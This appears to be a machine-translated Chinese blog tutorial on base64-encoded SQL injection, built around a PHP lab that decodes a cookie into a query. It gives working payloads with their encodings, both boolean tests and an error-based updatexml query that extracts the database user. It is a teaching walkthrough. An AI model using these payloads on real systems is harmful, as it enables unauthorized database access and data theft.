当前位置：网站首页>SQL injection vulnerability (XIII) Base64 injection

SQL injection vulnerability (XIII) Base64 injection

2022-06-22 06:16:00 【A τθ】

One 、base64 Code injection

base64  It is generally used for data encoding for transmission , E.g. mail , It is also used to encrypt images stored in web pages . The benefits of data encoding are , Prevent data loss , There are also many websites that use 
base64  Data transfer , Such as search bar   perhaps  id  Receiving parameters may use  base64  Handle passed parameters . stay  php  in  base64_encode() Function on string 
 Conduct  base64  Encoding can also be decoded .
 Coding and decoding process ：
1 ->base64  code ->MQ==->base64  Decrypt ->1
base64  Code injection , To bypass  gpc  Inject intercept , Because there are no special characters in the encoded string . The encoded string , To be decoded again in a program , And then splice it into 
SQL  Attack statement , Re execution , Thus form  SQL  Inject .

Two 、 The code analysis

 From vulnerable code , First of all, judge whether there is  POST  Of  submit  Parameters come here , If used $_COOKIE['uname'] obtain  cookis  The account number passed , Again 
 Joining together to  SQL  Bring in the query .
 What this code means $cookee = base64_decode($cookee);  take $cookee  Decode the transmitted parameters , therefore $cookee  The data transmitted must be advanced 
 Line code , Otherwise, failure to decode will result in an error .

Insert picture description here

3、 ... and 、base64 Code for injection

1、 Test injection point

 First observe whether the website exists  base64  Encoded data , For example, passing id value , Search module .
 If there is something like == etc. , It can be used  base64  Decode and test .
admin'and 1=1--  code  YWRtaW4nYW5kIDE9MS0tIA== admin'and 1=2--  code  YWRtaW4nYW5kIDE9Mi0tIA==

 The test page is  cookie , So we need to  cookie  Submit , And there are parentheses that need to be closed .

 Original string                      base64  code 
admin') and 1=1-- YWRtaW4nKSBhbmQgMT0xLS0gIA== admin') and 1=2--      YWRtaW4nKSBhbmQgMT0yLS0gIA==

Insert picture description here

 The first submission page returns to exist  admin, The second submission did not  admin, The two pages return different results , So there is  SQL  Inject .

2、 Query sensitive information

 This code exists  mysqli_error  function , So we can use error injection to further obtain sensitive information .
admin') and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- 
 Conduct  base64  code 
YWRtaW4nKWFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VyKCkpLDB4N2UpLDEpKS0tICA=
 Submit for sensitive information .